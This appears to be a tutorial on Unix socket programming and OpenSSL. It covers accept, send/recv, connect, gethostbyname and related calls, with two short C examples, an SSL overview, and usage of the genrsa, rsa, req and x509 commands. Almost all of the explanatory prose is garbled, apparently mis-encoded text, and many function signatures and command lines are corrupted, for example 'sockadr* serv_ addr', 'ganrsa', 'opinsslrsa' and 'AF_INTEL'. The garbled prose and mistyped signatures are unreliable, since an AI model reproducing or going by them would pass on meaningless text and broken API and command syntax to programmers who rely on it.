>/ / @)L* T) L* F accept accept() 0,< 0,6, % 1 2 56 ,6, ( E 5< E () L* nB G 7 9P " I -,< = - Y nB G 7 9P " 7 9P % -,< = ("c 0, , accept() ) -, @ 2 7) Y 0 # A R4 T) L* 2 ) 7 !89 T 0,< 6X 2 € - Y ] ) # -,< = , ,F accept() + , " U4 < O* % ! 0, , + 2 $ ' R4 _ F) 7 # nB G 7 9P 2 " , , ,F 5< " ,< F listen_] + X " 5< ) 4 7 L* @)- I < - N nB G ) -,< = X % .% ), ) ' 7 9P " " _=1 / () " _O # L* a 0, 2 0, "7 + B( '

#include <sys/socket.h>
int accept(int sockfd, void *addr, int *addrlen);

0 T Socket _] + -, @ + 2 M 9 IP h @ ) 7 4? ! 2 L* @ 5< 4 h @ nB G^P 0,< 'G C 8P H # , 3 - < a Addr … ` A R4 " U4 % ! 0, 5< S / addr a Sockfd … ?@ ` , ^P % T 9 a Addrlen … H- Y u ,G 1) :3 ?@ - 5 < a L* - Ÿ + 2 , :3 , < _…w] , 0 % H errno ,6 3 , B ?,< 2<) 0 "(5 TQ

#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>

#define MYPORT 3490   /* the port users will be connecting to */
#define BACKLOG 10    /* how many pending connections the queue will hold */

int main(void)
{
    int sockfd, new_fd;             /* listen on sockfd, new connection on new_fd */
    struct sockaddr_in my_addr;     /* my address information */
    struct sockaddr_in their_addr;  /* connector's address information */
    socklen_t sin_size;

    if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1)
        return 1;

    my_addr.sin_family = AF_INET;          /* host byte order */
    my_addr.sin_port = htons(MYPORT);      /* short, network byte order */
    my_addr.sin_addr.s_addr = INADDR_ANY;  /* auto-fill with my IP */
    memset(&(my_addr.sin_zero), 0, 8);     /* zero the rest of the struct */

    if (bind(sockfd, (struct sockaddr *)&my_addr, sizeof(struct sockaddr)) == -1 ||
        listen(sockfd, BACKLOG) == -1) {
        close(sockfd);
        return 1;
    }

    sin_size = sizeof(struct sockaddr_in);
    new_fd = accept(sockfd, (struct sockaddr *)&their_addr, &sin_size);
    if (new_fd != -1)
        close(new_fd);
    close(sockfd);
    return 0;
}

, ,F " 60, ' - Y $ T , N accept()+ b N ?@ L * recv()) send() + )- - Y % H 5 a ) -, 6 U ) "7 + ) 5 + ) 2 B ( '0, 6- 1P

int send(int sockfd, const void *msg, int len, int flags);
int recv(int sockfd, void *buf, int len, unsigned int flags);

0 -,< z * E@ " accept() + " -, @ 1 60, < _ ` T 0 Y ?@ b' 6 B . a Msg … @ %Q] I'/ H TCP ) ' S / ' 2 ;. 5 iX a Sockfd … L* " - 1 ,B'?) ) T 9 a Len … 6- a Flag … , `4 " & 6 4 0, RN ' 6- B .
h @ recv() + I'/ 0 7 1 ) 0, , 6 3 …w :3 d* X S / len u 6") ' ,G -, " ) ' 7 1 ' 4 2 a Buf … H E@ + ) 2 6 , ,G $ PQ ,! 1 ,G 2#5 , H 0,<P? # , + , H wqqq , len 1 ), - ] 1 6- % " †qq 7 0, d * 5< , 2 @=B # , send() + b T /, # T u 6- e 'TQ ? ! 0, < pqq 5< -, -, E/ , H _ ' G B / 6 a 0,< \ ? 6- 6 ) A /) b 'recv() ) send() + a # ' )T ) UDP A) ( B , 63 1 ) œ, P , , T shutdown()) close() + , 5 ' T - 0, , P ) < N" ^P , ^P ,< M 9 ? " , , < " " ? " 6 B', 562# 1 ) a close()+ "7 B( ' close (int sockfd) ; + L* + b ,< ? 56 sockdf L* 0,< ,6 3 - Y % H ' 2 0 I & )T a Socfd … L* , H 0 accept() -, socket() I ) nB G 7 9P ( 5 N close() + b < 9P 0 % ! 7 9P = a TCP 7 9P " ), A" 4 $- # TP H / ,,P N ^P - X 6 ?@ F , 0, 'X nB G ?@ B ( ' ,<P shutdown() + "7 ,6 * 2 N - Int shutdown (int sockdf, int how); 0 I a " ? `56$- R4 " , T 1 ) " 0, 6- "@ ' "@ 8 C g - ' a Y ) ) '% ! 2#5 g - 2#5 g ' , 6 3 …w + 2 , 0, _TCP %# ) 4 . a, -, 6 U ) H- Y 5 , G A" :3 ") 4 0 aw , … 0 " ? `56 )T ap , … %5! close() + 0, 5 u ) , … T F) 3 ' % ! - A) a How … 2 ^ " ^ , 56 1/ 2 0 < # 2#5 ?@ 1/ 0, " a Sockfd … L* 7 B P H+ , 56 :3 - 5< errno P] - Y 4+ , , < 'G 5 P, + G T/ 0, < E - Y + " # 0, ) + 2 F) -, 6 U ) ) Yˆ 6 E 0, Y -, 6 U ) < 5 connect() + b (E , F) 5 - Y 6- ^P H %5! 2 < ' R4 X ' 0, , Pshutdown () socked_] X -, 6 U ) C 5 " 2 0,< ,6 3 0, CH , _=1 - Y ,< 'G B P H j* 0 ?@ ) , , ( N6 _O , < I ,H iX recv() ) send() + )T close () + b 5 " _z -,< E ^ P C _ connect + ) < listen () + 0 connect () + " -, 6 U ) - Y ) ,< -,< F I ,6 3 & @ ' + 2< ^P ) -, 6 U ) E - N@ , < -,< a H accept () ) 3 ' connect () + "7 B( ' #include <sys/types.h> #include <sys/socket.h> int connect (int socket, struct sockadr* serv_ addr, int addrleny); 0 Socket() + -, @ ` 2 3 ' Sockdf \ " 0, < 'G C 8PH 0,< ,6 3 2 G ,L / ? ), #B, - 5 <2 %L , ? ! h @% 5< 5 S / I ), 0, ? O* 5< -, 6 U ) / (8! % ` a Serv_addr … 0 2< IP h @ -" , : Addrlen … B P H ` H sizeof(struct sockaddr) -, 6 U ) 4 h @ ? 56 a SOCKDF … 7 4 h @ ) ,L 'G 0 % ! 
L* 3 7 4 h @ 5< 5< , 42 H # 2 ' L 7 4 - 5< H) v 4 , 8 C R4 X 3 9 5 2 -, 6 U ) ), < - O* % ! ,6 3 M 9 & 3 7 4 h @ $^ P -, \) < ^P , ,< d * ) [, C G:H -, 6 U ) 7 4 0, 5 \) < , 6 3 …w + 2 TCP ^ P , 0,< H - :3 - 5< errno Ÿ UDP A) a( , , (E ( T /0 \ A R4 ) ) UDP A) \ ' (,! 7 ' u ) ' ' )T )T $T + ? 7 0 -, 6 U ) socket () + 4 3 ' 2 0, E ( 5 … \ " _=1 0 < ( E SOCK_DGAM _ bind() + ' - ]0, 6, GH h @] š ,P P ]0, ? I 6- 7 4 h @ -,< E ' I , 'X h @ ,< A" 4) ' - 0 ,6 3 R4 ?# T 0 < ( E sendto()) recvfrom()+ B _O ˆ 6?), _z H) _,6 5 ( GT ) -,< d * _7 4 )IP \ ' 0, , P )T -,< E C _ 5 4 ) socket 4) socket() + ] 0, E ( … \ " _=1 _ SOCK_ DGRAM] 0, 5 T -, 6 U ) , 6, 5 )T 5 G 6- 0, 5 T ? 6' - $, < # <, N , 'X 1 ˆ6?), ,< " -, 6 U ) " 0, , P "7 ( 5 P- 5< " ' -,< E T 6_O # H) -, < 3 < -, 6 U ) 0, 6, ( E a - + _z B( ' Int send to (int sockfd, connect void* msg, int len, unsigled int flags, const struct_to, int tolen); 0 z * F socket() + -, @ E@ " 1 6- ( 2 0 -, 6 U ) Y d* 3 7 ?@ H UDP ) ' 0 0, N I H %. h @ a Msg … I'/ ( 4 2 ' 0 <T S / ?@ C 8G'$;. ?) 4 - 5 < 2 `56) , L a Flags … , ` 4 " &6 4 2< a TO … ` IP h @ , ^ ) -,< ( 4 T 9 a Len … 1 Sockaddr \ " 8PH C a sockfd … L* ` 0 < I size , sockaddr ` ?@ , I of (struct sockaddr) 0 T ,G send() + , 56+ 2 n' % ! , , 2 :3 , < _…w] # -,< T 6 T , ,G , 6X , errno # 6" 0, 5 0,< B / ") B1 T 9 a Tolen … H 0 u @T 2 `56) - "7 -,< ?@ :3 - 5< X ,G 3 2 C 5/ 0, N I a , ( P- B ' + & B( ' Int recv from (int sockfd, void buf, int len, unsigned int flags, struct sockaddr_ from, int_ from len ); 0 ,6 3 -, @ H %. ?@ F socket () + ' 6- ( % ! L* I'/ " a Sockfd … B . h @ a Buf … 0 _ S / ] < ' , 4 T 9 a Len … ) ,< ?@ 3 5< ) I ,P socaddr \ " ` a From … 7 4 h @ ) IP h @ 7 L* ?@ % ! 8PH C 0, 0, 0 A" 4 -, I ?@ % ! 
42 0 -,< ' Y ?@ a Flag … ` T 9 a Len … ,G & + 2 0 / 56 , ' a #P < #P< , 0 63i 6 6 N + @2 5 " , Y+ -,< 'G 5 3 6- 0, + 6, @ " g ),Y a getpeename() + include<sys/socket.h> int getpeername(int sockfd, struct sockaddr_addr, int_addrlen); ) 47 4 h @ ) IP h @ % < $% -, < = G % •7 + 2 M 9 6 6, + 2 " - Y 4 0, 5 z * ^P % M 9 a I 2 0 -,< = G ?@ 0,< ,6 3 4 % 3 8P C H sockdaddr \ " M 9 7 4 h @ ) IP h @ % ! .sockaddr u ) , 6 3 _…w] , ` l '+ n 9" @ C5 / , ?@ , A 'U LE \ " 5 < 2 < 0, : Sockdf … ` a Addr … b ` T 9 a Addrlen … ' (, ! 7 :3 - 5< errno 0,< ,6 3 I :3 \ h @ ) IP h @ S L* 2#5 ) % ,P ,< - < ?@ # BE 7 7 4 Š j* G gethostname () + ( 2 $, ,6 3 $ < F ?@ ) _ www.ibm.com C 8Q) ?@ IP h @ 5< < ( + 2 2< 2 5 ( a TG < "7 + B( ' #include <unistd.h> int gethostname(char *hostname, size_ ); U4 _ < 7 P ! ] 6 " 0,< ,6 3 - 3• E @ 0 :3 - 5 < % P H , 56errno 0 2 , )- ") ,6 3 Y -, 6 U ) -" / ( , G 0, 5 ) ,L a b. 3 E < E , )# K 1Q - Y ?@ IP h @ " C 5 e '2# 1) , h @? ! N 8P C H X N56 , 1 ) #B 5! " 9 ) DNS 5F H 5< , DNS @ 5F 0,< ;. ?@ ^P < T 9 a Size … , , %5! l '+ '?@ H) E " " :3 ,< _…w] 0, 5 - Y W 3 2< 2< ( + S / a -" / -, a Hostname … @ -, 6 U ) " B( ' -" / ( h @ , ,@ 2 #include <netdb.h> struct hosten * gethostbyname(const char * name); 0-, 6 U ) 7 ?@ 3 hostent \ " < a Name … -" / ( ` h @ $+ a , -,< = G " Struct hostent Char *h_name Char *_name Char **h_aliases Length ; ¡Int h Char **h_addr_list; }; 8Q C , 6 3 -" / ( < 2 #P< ] 2< ( a Hname … 5 _www.ibm.com _ < , , B'2 #P< 3 wq < 2 ] 2< , <- < ( a H_aliases … G 3 a H_addrtype … N 56] h @ - _0 < ,6 3 AF_INTEL S / h @ T 9 a H_Length … -, 6 U ) 2< ^ IP h @ ?@ 0 < , ` ), ` I errno < 0, - < u $? &@ - < B PH + M83 ) $? 
u 0 < ' :3 \ = ‰9 < 2 0 c + &@ ' 7 2 NULL , 7 herror 5 ) X TQ 3 |q ' 7 ,6 3 I I H _ addr_list… < u ?@ H g ) 2 g + 25X F) + 2 H , F ) ,< ,6 * herror() 5 a, H ) +' " F)

#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

int main(int argc, char *argv[])
{
    struct hostent *h;

    if (argc != 2) {  /* error check the command line */
        fprintf(stderr, "usage: getip address\n");
        exit(1);
    }

    if ((h = gethostbyname(argv[1])) == NULL) {  /* get the host info */
        herror("gethostbyname");
        exit(1);
    }

    printf("Host name : %s\n", h->h_name);
    printf("IP Address : %s\n", inet_ntoa(*((struct in_addr *)h->h_addr)));

    return 0;
}

E )- ' ) )? ! 0, k F) 3 ) 'b3 ) ( ' Enter , B) < ) IP h @ 7 L* a ? getip -" / ( h @ 7 2 ( ?@ 5F " A" c " 7# 2, l ' 9_=1 13 B ' -" / ( B F U )- Œ aTQ 0, 6 $getip www.ibm.com , IP +H ) h-addr-list u 6) @ #P< , -, < - 3•BE 7 ( Y : ' - < L 1 ) < ?@ T) 1/ F) 3 ) k T G IPh @_O -" / ( h @ 3 |q , < b '5 < , h @ % ,P 7 6 l' 8G' C 0, , " inet_ntoa() + " _pws 0w{q 0w†}žw‹q C 8Q] 0 in_ \ " ` P E 2 ?@ 0 ) )? @ inet_ntoa() + ) ,< = G ?@ 3 -,< •\ nP : • %5!_z %L' , addr 5 3 lY %5! 1 ) 2 5> ) ) 4 " •\ nP: • %5! 0, ' Q $X SSL g( [Secure Socket LayerZ a – N& 5 3 6 T F 2 7 !89 T P '9 6, ) 6- 0, , < / 9 78# 2 " -,5! %# 5 $ 6- N ?,< nK' " . " , N& P ! 78# 2 0, ' P ! -,5! N& … ? 6? # ) " , 6 & , B) ,B , F ) , ,F 0 6 6 ( ? 21 ) 0, ) ) ?@ c ! 0 * & ( ) " N & A) ) 6 P. % H 6 ) " ?@ () %# F N& … N & , B? , B T P A) 2 %# 7 2 T %# 0, < - 4 1 g CP 6( 6 P . m.1 & 3 b' , F ?@ - 0, F A) 2 F j & " 0,< & A L3 , B ) M 9 " ( u4 , Gœ L3 , B) # & ) -,< B ), , < 2t5: F N& … %#< N& A) 6- . !89 , 6 * ? N ' n 9 @ ? )@ 5! , B " ? N ) , & A ? 59 ? 6? <& , B ) 2 " , T 3 , B) N,56 ) " N ,B ,B 5! , B ) bP 1 < 6 V ? 5! , B ) -, N & A) ) ? , , 6 #P < <) 0-, a" , – 0 2#5 L3 , B 0 < 2 5! , B ?@ , Z> - Y ( u4 ? " 5! , B n P : A) 2 0 < ?@ , * , u4 ,6 * ?@ D B %# A 0 ,B 3 " %# 2 %/ x 0 5! , B k F % / 0,< \, ? 5! N& …p %#< N % H"E g 6 'L ? E/ ? F b ,B & 5! , B -,< T, ) 1 , B" - Y ! 'L ?
, -, m .1 ? , B 0, 0 < - U ), 7 !89 % ?@ " - Y ?@ N 7 !89 ? & n 9 " , & 7 !89 N 6 H- Y . … . " I . 0,<P ' N1, @ 7 !89 • & '7 !89 - 56) 'L ? < & -, , B 0A L3 0, & 6- 5 0 % / -, -, < T ' $7) Y 7 L3 , B % ? "@ -, Hash 5 6- , , ' & 0 < - 1E ,4), > 0 ' B ( u4 - 56 5 … 5 " L3 _ 1 E ( u4 ) ? ? 6( u4 Hash /? & ) 1 ?@ Hash + 6 u4 m .1 , < ? # Hash L3 , B ? 56 6 2#5 I , P. > ] < 7) Y Hash g P . -, ' > U 7 ), O / $, 6 ( u4 Hash ' ) 2 ), , ' " -, ' 0 < 6- 5 5!, B 1E " / 6- 5 ) F ) ( 4 n,L … ?@ b 6 L3 , B L. P! ?& ) < , h F n,L F n, L 0 @ F ? "@" - Y , , 1E 6 b F 6 Q 1/ < $ < ( E P! 5B ) 6 5! , B bP ( u4 n, L 0 6 - Y -, < (E 9 ,# c 5G %5! C 0 6- < ( E 6- ™Y/ 6- 4 •A) ) S n, L ( u4 , P 0 F L3 , B 2< ?@ h 5 ) ( u4 n, L +H ) A" F n,L d* , ,F - ()&B) ("c 6) #1 " ? 59 ?& h 5 5 5 0, N,# , A" ( u4 ,P n,L 6 0 -, ! 6 5! , B] , 6 T. 6 ? v ') 3 U) ? 2 4 i: N 1P 0, < 60, b 0 2 6 3 = D) , 6 2 " M, 6, 6 % # S , $? @ 6 - E" U) 6 ?@ U) ) _= B* 6 U) 0,< 5 ™Y/ 2 X YD) 6 %3 6 U) F 6 , ?@ -, 6 U) 6 S BB S " U) F 2 0_, , 6 U) - 4] … A W L* 2 ), - , P G< 2 3@ " 6 6 > )( % < 6 > 0 < Z> A 3 a SSL %•) 4 H- Y #P< ) TCP/IP % # ) 4 c c 6- TCP/IP %# ) 4 )T HTTP) LDAP) IMAP , 6% # ) 4 ) 0, < F SSL %# ) 4 …‹ %#< c" c ) 3 6 c" ,6 -" F SSL BH < -,6 l '%#< !89 ) , 5 E , ) F N& 2 T L SSL U) U) M 9) 5! , B ) 6 % BH 2 a SSL -, 6 U ) &'( P! " 0, 5 % 5! , B ,6 -" F -,<, 7 67 P [ … / ? 59 ) N& T U) a, ?# 2 9 ?56 SSL 0, @ ) R 4 ? # & % 5! 2 U #!] , 5 7 P [ SSL 2 `56œ_ ? 2 4 SSL , 6" ,6 # " - Y $ ) 6 ), & , , 0 U) 6 ,6 H 2 `560, 5 % 3 5! % H 6 ), BH 2 a SSL -" F ) / ? 59 & 1 U) 67 P[ 0, 5 , ,6 -" F U) ) ) &'( BH 2 a SSL 2 TL ) 0, 5 1P -,< & 7 ) SSL Record protocol a = G 6- SSL ( u4 1P $ 6( u4 2 %# ) 4 protocol SSL Handshake % # ) 4 " - Y - . & SSL 1P " M, 60, 5 SSL = G 9 P %# ) 4 0, ) ) U) a 0 ?@ M 9 ) 6 9 ) !89 K &F % # ) 4 ) " SSL % # ) 4 -, < % # 'SSL T ? ) U) " M ,6 U) b 6 ) 67 P [ N& N1O * 0, _ 3] ) U) <,B 5! , B , - Y U) < , B) 5! , B N& % " g@ SSL Handshake ( u4 5! 
, B " - Y <,B 3 ( u4 & U) SSL -" F ) B F 6 ) N & TL N& " 0,< A 3 G F " ? 59 ) 6) 5! , B G U) U & $ 6- ? )@ 67 P[ % < , 9P %# ) 4 P SSL % # ) 4 <,B K ,6, -" F ) E SSL $ 0,6 67 P [ N& " - Y SSL -,< 0, 5 P 4 N& 2t 5: 6 %# ) 4 " '2 0 œ, 5 7 P [ U) & " '2 0 , B 2 0,6 H- Y 0,< a, -,< - )@ " 83 9 %/ 2 'L - T $& " SSL * N1- Y SSL ^ P U) - 5< ) ) U) !89 N ) -,<, 1 0, 5 U) 3 6 U) 6 3 ) -)8! ,< Y T) B / ,< U) !89 & 6, " 0, 5 0, ) 6-, < T N& T L E ?# ) , b T T & !89 " - Y (8! , U) 7P [ ) 6 0, 5 0 ' N1 ( ') F )@ & ) -,< 1P T. & ) 6- 5! , B E T ) 0, 5 ,B -)8! 0, U) T 6, g - Y U) ) G œ, ,< 3 6 ) ,< - 5 3 TL 1 ) , . ,B & F) U) 1 ) . ,B ?@ -,< & 67 P[ 3 ) - 56 -,< Z> ( u4 U) , " - Y ?@ ) - ) 1 ) 67 P [ . 3 U) 6 A 3 L3 , B " ) ) 0, 5 U) 7 2 0, 5 , 5 ,1 1P SSL ? ?@ " - Y ? 59 T T9 B F, B 1 ) . , B" - Y T9 !89 0,< B F 2 `56œ < ( u4 . 2' & ) u" U) ? ) ) ) <,B N& , B 2 " - Y G -,< 1P 7 !89 0 B F, B B ) T 6( u4 ,6 \89 ) 9 P " '2' ? 4 -, < & u4 B ) ( u4 U G F" % / U) œ,<, 6 3 & 0, 5 0,< 9P " '2 ' ? 4 , ' u4 U) & ) U) 0 SSL -,< <R V < G F " ? 59 ) B F , B ) -, & $? )@ SSL (5 & B F, B 2 " ) 0, 5 6, 2 G g ) $, - Y ,< - U) 5 3 TL , . ,B & 1 ) 9P " ' - Y 67 P[ U) 6 A 3 ) 3 6- ) 0, 5 U) L3 , B " ) 7 0, 5 , 5 ,1 B F, B 1 ) 1P SSL " ? B F ?@ " - Y ? 59 T T9 . , B" - Y T9 !89 0,< 2 `56a < ( u4 U) ? N& ) . 2' u" ) ) ) <,B N& , B 2 " - Y G -, < 1P 7 !89 GF 0 B F, B B 0, 5 T 0,< U) 6( u4 ,6 \89 ) 9P " '2' ? 4 0 , SSL -, < <R V < G F " ? 59 ) & u4 B ) -,< & ( u4 9P " '2' ? 4 $? )@ ' U u4 B F , B ) -, U) U) & B F, B 2 " ) - Y a ) 9 ?560 6 , ) T T 6 ) " , 6 " ) U) 3 6 " - Y U) ) SSL 6, SSL 6, P! ? " 0 Fv s B / +:H 6, 667 P [ U) &'( 0, 5 7 P [ U) U) ) ,< Y SSL 9P " ' ) &'( a, 6 ) SSL 9P " ' (5 & / a,< , 6 3 & 0, 5 " p B / % € 0, 5 ' P Qv 4 " 6 @ PG ) , @ ',< -,< —> A 3 6 0, 6€,< U) 2G 5! % H 6 12 0 6 3 5! % H 6 -, ( 2 0 3 1 & 6 U) ) , - )@ -, 6,<P 6 " ,G ) ), 6 & 6, # ) # ) #1 > " 6 7 !89 ) ,< - : -, < - Y ) , u 6 6 ) 1 5! 
, B @ : ) # ) #1 > ), ( & b ?@ > L3 , B 6 0,< ,6 * , ) ) 6 -,< +H ) ) U) ( #P < ?56 P Q l '7c (5 a (E * + " 6 2 " - Y 6, B E … CRL ) CSR $ 6 , ( u4 -, # & E SSL Shell n 9 " 0,< DSA ) DH $ RSA x.509 C GH ) openssl 7 # " - Y ? @ v 4 0,< ,6 * OpenSSL 0, ?@ ,6 * & > , , 5! , B " - Y -,< • 6 g 3 6 B / 2 € 0 2 & U) 1 ( 2 ), 0, 5 5! , B , TL 7 ), 6 @ " DN ,B' 1 -, @ 6 < 5 , -, 1SSL 0, 5 'X €, 6 " & 6) ), ?@ N & ), R4 3 5! % H 6 U) ), 6 N1 B ) TLS ) SSL E … P. … & )? U) ? … S/MIME -,< & 6( u4 , … a openssl " ) ) & … ' Openssl command [ command_opts ][ command_args ] 2G - #B 5! \ ,< Y? " – 0, - 56 N - 7 6 @" " - Y & 1/ 6 , ) ;! 2 0 < & U) ? passphrase 2 ? ) ) S F ( 5 ?, E , ) ) ?, < ? - Y 7 passout " (, " 6S 6 " passin R 10, < 0 < 6 , B2 < " passphrase ^ < F? 5 # &' >/ passphrase 5L ?# 2 " - Y 6 & " ' & b passphrase 5B 0 d* , < ? ) _ F) 3 passphrase ) )" ^ a " & ) 2 openssl 4? ! - Y passphrase 7 P! " …pass : passphrase 0 < 0 < - Y passphrase ?, 3 " 0 < - Y ? &56 9 ( 5 % < T) L3 , B 6) < ,< passphrase # ? 1/ 2 6 6 ) F ( N6 ] passout- passin S L3 , B -" , - 0, ) # " %P H 6 G ?, 2 0 Y 2 " ? L3 , B 2 " -,< , 1 2 , 3 % L3 , B 2 " - Y F ( N6 < - Y U ) 9 6 2 N M 9 " 0,<P - Y % H ?,< -, " 7 , M 9" 7 passphrase , ^ & ", 2 ( 5 x509 ) genrsa req , rsa " H P 10, $, , 1 CSR 2 U 3b 6 # 0 5 - Y ), 0 < > (E ? , 1 ( N60 < - < 2 0 6 4 PU ) 3 ' ) 0 ),G -,!" - Y ("c SSL ), 0 <- command ,G L3 , B , 5 T 2 < , - Y var :. u , " - env : var pathname % 'T) : " -file : pathname …passout ) …Passin & ) % ' " 0 < passphrase ?, 3 () ) ) passphrase ?, : " ) 3 T) : 0 < - Y passphrase ?, 3 , < number ?@ M G - 5< - Y F) 3 B'" -fd : number 0 < e 'j 4 & " #B 5! 
2 < >G - 56 manual 7 .Y -, 3 , ) )" 9 0,< 5 stdin " - Y Passphrase - stdin " x509 ) rep , rsa , genrsa 7 7 2 0 < U4 ,G - 6 5 H iX @ T) , 0 6 F) @ a genres %# < 2 RSA B ( '0 ) L3 , B , 1 2 0,< " Openssl genrsa [-out filename] [-passout arg] [-des] [-des3] [-idea] [-f4] [-3] [-rand file (s)] [numbits] aT) , -out filename < < ?@ F) 3 L3 , B - Y F) 3 % '( & 2 " 0, < -idea − des3 -des & IDEA DES3, DES 0, - Y 6 & 6 d* < stdout N1" # " L3 , B ? -passout arg DES3, DES ? d* a, 0 N1" # " $ <- Y , B ? 0 < numbits 6 - Y & 2 " Šwp ?@ e Y 4 , , 1 passphrase ?), ) IDEA & F) 3 % 'passphrase ›, d* wqp‹ T 9 , BT 9 L3 , B " openssl genrsa - out rsakey. Pem 1024 ) DES3 N1 -, < & wqp‹ T 9 L3 , B a, " , 1 W 3 passphrase openssl ganrsa - out rsakey. Pem - passout pass : enter –pass-here-des 3 1024 a rsa ? 2 " - Y 6, B' , 0 u a,< 0) @ . 0 " %#< RSA 6, B % ,P N ' 2 , B ( '0 5 -,6 2 ' " 6, B , B =B* opinsslrsa[− inf orm PEM NET DER][−outformPEM NET DER][−in filename][− pa sin arg] [−out filename][− passoutarg][−sgckey][−des][−des3][−idea][idea][−text][−noout][− modulus] [−check][− pubin][− pubout] aT) , - inform NER, PEM , , NER, PEM? , d* , 2 G L3 , B ) )" F) 3 , B ) ), B % < - Y & 2 " ?@ paaaphrase , < -, < & & ' ) )% ' 0 < - passin arg d * ' PEM ?@ e Y 4 , 0,< DER 0 - infilename , ) ), B PEM ?@ e Y 4 , 0,< DER 0 - outform 2 G 6 & -, 3 ) ),B 0 < - out filename " 0, d* < , -,< < ?@ F) 3 L3 , B F) 3 , B B' - Y & 2 0 < - passout arg d * ?@ passphrase , < -, < & & F) 3 , B 0 < − des − des 3 − idea ? IDEA & DES, DES 6 0, - text 7 -, < , 1/ - noout F) 3 - Y -)8! 0, N1" # " L3 , B L3 , B ' F) 3 & - L3 , B 6,B'-,< , ( ' & 2 " Y 0, < 5 - modulus 0, 0, V4 6D F) 3 L3 , B 6,B' 6D , B modulus 5 H passphrase " Opnssl rsa –in inkey. Pem- passin file: pass- file- out outkey. Pem -, 3 , ) ) " passphrase] , & L3 , B " a_ < openssl rsa- in inkey. Pem –des3 out outkey. Pem a,6 ? L3 , B 7 . " openssl rsa-in inkey. Pem – text - noout a req , B, 1 ?@ " ? 
a,< , 60 < " %#< 2 - Y CSR , B ( '0 5 - Y & 2 " 6 ) L3 opensslrep[−inf otmPEM DER][−outformPEM[−in filename][− passinarg][−out filename] [− passoutarg][−text][−noot][−noout][−verify][− modulus][−new][−rand file(s)] [−nwkeyrsa: bits][−newkeydsa: fise][−nodes][−key filenane][−keyfotmPEM DER][−keyoutfilename][−[md5 sha1 md2 ]][−configfilename][−x509][−days n] [−asn1− kludge][−newhdr][−extensionssection][−reqextssection] aT) , -inform NER, PEM , , 0 -outform NET, , ) ),B F) 3 CSR 2 G PEM ?@ e Y 4 , 0,< DER d* CSR ) )" ) ) CSR , , % < & ) )% ' - Y ?@ paaaphrase , < -, < & & 2 7 -,< , 1/ -)8! 0, -noout -modulus F) 3 CSR 6 D F) 3 ' d* CSR 6,B' F) 3 6, B'-, < , ( ' & 2 " CSR %3 -, 3 ) ) CSR 0 < -text - ' PEM 0 < -passin arg ' PEM ?@ e Y 4 , 0,< DER , 0 -infilename " 2G 6 & & Y 0, < 5 6D 5!, B modulus 5 H 0, -new 7 !89 ) E < CSR 0 < - Y -, < d * _0 < -newkey rsa: bits CSR -keyout filename E ;! ' , –key & 2 " - Y ) )" & " , B " CSR & " ,1 ,B ,< -, ) PSA L3 , B 0, d* ,B 6 < < ?@ d* ] & 2 " - Y ,G Bits 0 < L3 , B B'( , -x509 E root 6 CSR < F ,1 & 2 d* & 2 " - Y 0 < -days n P! ?& n ,< -,< - Y –x509 6 & " 0, , 1 CSR a, L3 , B d* " - Y " openssl req - new- key key. Pem - out req. pem. a, , 1 ? &56 9 CSR ) L3 , B " openssl req - newkey rsa : 1024 – keyout key. Pem – out req. pem. a, , 1 ? &56 9 root 6 ) L3 , B " openssl req –x509- newkey rsa: 1024 – key. Pem- out cert. Pem. 
x509 B ( '0 < - Y 6 ), & b 6 a,< , 2 " " %#< 2 opensslx509[−informDERPEMNET][−outform DERPEMNET][−keyform DER PEM][−CAformDERPEM][−CAkeyform DERPEM][−infilename ][−outfilenam e] [−hash][−subject ][−issuer][−nameopt ][−enddate ][−purpose ] option][−email][−startdate [−dates][−modulus][− fingerpr int][−alias][−noout][−trustout ][−clrtrust ][−clrreject ] [−addtrust arg][−addreject arg][−daysn][−signkeyfilename ][−x509toreq][−req][−CAfilename ] [−CAkeyfilename ][−CAcreatese rial][−CAserialfilename ][−text][−C][−md2− md5 − shal − mdc2] [−clrext][−extfile][−extfilefilename ][−extensions section] a T) , - inform $PEM , , - outform $PEM , , ' NET F) 3 CSR 2 G ' PEM ?@ e Y 4 , 0,< DER 0 0, -, ) ) CSR 2 G PEM ?@ e Y 4 , 0,< DER 0 - in filename 6 & d* CSR , ) ) CSR 3 % < NET ) )% ' - Y & 2 " 0 < - out filename " 0, d* , CSR -,< < ?@ ) ) CSR ) )" B' - Y & 2 0 < - text 7 -, < , 1/ 0, - nooout CSR F) 3 CSR -)8! ' -, 3 F) 3 6, B' & - 6, B '-,< , ( ' & 2 " - Y 0, < 5 - modulus F) 3 6 5! , B modulus 5 H %3 0, - serial - hash 0, 0, - subject - issuer 6D F) 3 6D F) 3 0, 0, 6D 6 6 S/ 6D F) 3 6D F) 3 6 6D T - 5< ( hash , 6 ( -, S/ ( - email 6 D F) 3 6 S/ # ) #1 4h @ 0, - startdate 0, - enddate - dates 6D z) 3 0, 0, 6D z) 3 6D F) 3 - fingerprint 0, - signkey filename 6 > 6D F) 3 6 < E filename > v ) ), v 1E ;! ' v 6 6 root 6 ), > & 2 " - Y H L3 , B " - Y 0 < - keyfrom , , ) ) L3 , B PEM ?@ e Y 4 , ,< DER 0 - days n d* P! ?& n ,< -,< - Y –x509 6 % , PCSR - Y d* 6 –signkey 2 PEM & " 0, - x509toreq , B " 0, & ' & 2 -,< - L3 0 < - req -, 3 ) )? ! -, 3 ) ) 6 e Y 4 CSR 1/ & 2 " - Y 0 < 0 < - CA filename ? > 6 0 < - Cakey filename " ? - Caserial d* filename 4( " & nB G & 2 b 6 d* ), & 2 b 7 P ! % '2 ( 4 -)8! , 6 E ), < & 6CERTICATE T 0srl , - CA createserial d* > 0 < ), 6 - Y L3 , B < - Y ?@ - 5< ) / % ' e Y 4 , 0, & 6certificate T ^ 6 - 5< % ' filename - extfile filename , H ?@ 6extention - Y 0, - extentions sectio & 2 " W 3 extention 6 d* ? )&' 0 < a,6 ? 
6 B' 7 !89 - Y "
openssl x509 -in cert.pem -noout -text
a,6 ? 6 T - 5< "
openssl x509 -in cert.pem -noout -serial
a,6 ? 6 S/ ( "
openssl x509 -in cert.pem -noout -subject
a,6 ? 6 1E > "
openssl x509 -in cert.pem -noout -fingerprint
% ,P DER a, ' PEM '" 6 "
openssl x509 -in cert.pem -inform PEM -out cert.der -outform DER
a, % ,P CSR 6 "
openssl x509 -x509toreq -in cert.pem -out req.pem -signkey key.pem
